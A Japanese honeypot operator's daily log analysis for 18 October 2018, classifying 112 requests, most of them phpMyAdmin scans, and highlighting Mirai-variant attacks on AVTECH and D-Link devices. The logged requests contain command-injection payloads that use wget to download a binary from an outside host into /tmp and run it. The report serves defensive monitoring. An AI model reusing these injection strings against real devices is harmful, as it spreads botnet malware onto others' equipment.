ハニーポットのログ分析(2018/10/18)
WOWhoneypotの2018/10/18(木) (運用135日目)の簡易分析です。
本日の総アクセス件数は 112件です。
主にあアクセスは以下です。
・AVTECHの脆弱性を突くMirai亜種の攻撃:8件
周囲で観測報告を聞いていたものが、うちにも来ました。User-AgentはSefa。
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://209.141.40[.]213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1
User-Agent: Sefa
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
他に、D-Linkの脆弱性を突くものも、User-Agent: Sefa でした。
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
35 | 2018-10-18 | アクセス | GET / |
8 | 2018-10-18 | AVTECHの脆弱性を突くMirai亜種の攻撃 | GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin |
2 | 2018-10-18 | phpMyAdminの調査 | GET /v/index.php |
2 | 2018-10-18 | phpMyAdminの調査 | GET /shaAdmin/index.php |
2 | 2018-10-18 | クローリング | GET /robots.txt |
2 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAdmion/index.php |
2 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAdmin+++---/index.php |
2 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyadmi/index.php |
2 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAbmin/index.php |
1 | 2018-10-18 | IISの脆弱性(CVE-2017-7269)を突く攻撃 | PROPFIND / |
1 | 2018-10-18 | D-Linkルータの脆弱性(CVE-2015-2051)を突くMirai亜種の攻撃 | POST /HNAP1/ |
1 | 2018-10-18 | INSTARネットワークカメラの管理ページの調査 | HEAD /tmpfs/snap.jpg?usr=user&pwd=user |
1 | 2018-10-18 | 不正中継の調査 | HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png |
1 | 2018-10-18 | 不明 | GET /yealink/y000000000000.cfg |
1 | 2018-10-18 | phpMyAdminの調査 | GET /xampp/phpmyadmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /www/phpMyAdmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /web/phpMyAdmin/index.php |
1 | 2018-10-18 | WebDAVの調査 | GET /webdav/ |
1 | 2018-10-18 | phpMyAdminの調査 | GET /typo3/phpmyadmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /tools/phpMyAdmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /pmd/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /pma-old/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /pmamy/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /pmamy2/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /PMA/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /pma/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /PMA2/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAdmin/phpMyAdmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpmyadmin/phpmyadmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAdminold/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAdmin.old/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpmyadmin-old/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAdmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAdmin__/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyadmin_bak/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAdmin-4.4.0/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpmyadmin2/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpmyadmin1/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpmyadmin0/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpMyAdm1n/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpmyadm1n/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpma/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpAdmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /phpadmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /mysql/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /mysqladmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /mysql-admin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /myadmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /myadmin2/index.php |
1 | 2018-10-18 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
1 | 2018-10-18 | D-Linkを狙うMirai亜種の攻撃 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.40.213/dlink%20-O%20-%3E%20/tmp/gexoe;sh%20/tmp/gexoe%27$ |
1 | 2018-10-18 | phpのWebShell設置の調査 | GET /index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /index/article/lists/cid/3 |
1 | 2018-10-18 | phpMyAdminの調査 | GET /db/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /claroline/phpMyAdmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /admin/PMA/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /admin/pma/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /admin/phpMyAdmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /admin/phpmyadmin/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /admin/phpmyadmin2/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /admin/mysql/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /admin/mysql2/index.php |
1 | 2018-10-18 | phpMyAdminの調査 | GET /admin/index.php |
本日のドメイン名でのアクセスは以下です。
4 GET /
2 GET /robots.txt
本日のハンティングログは以下です。
8 2018-10-18 wget hxxp://209.141.40[.]213/avtech
1 2018-10-18 wget hxxp://209.141.40[.]213/dlink
1 2018-10-18 wget hxxp://185.223.163[.]17/mips
以上です。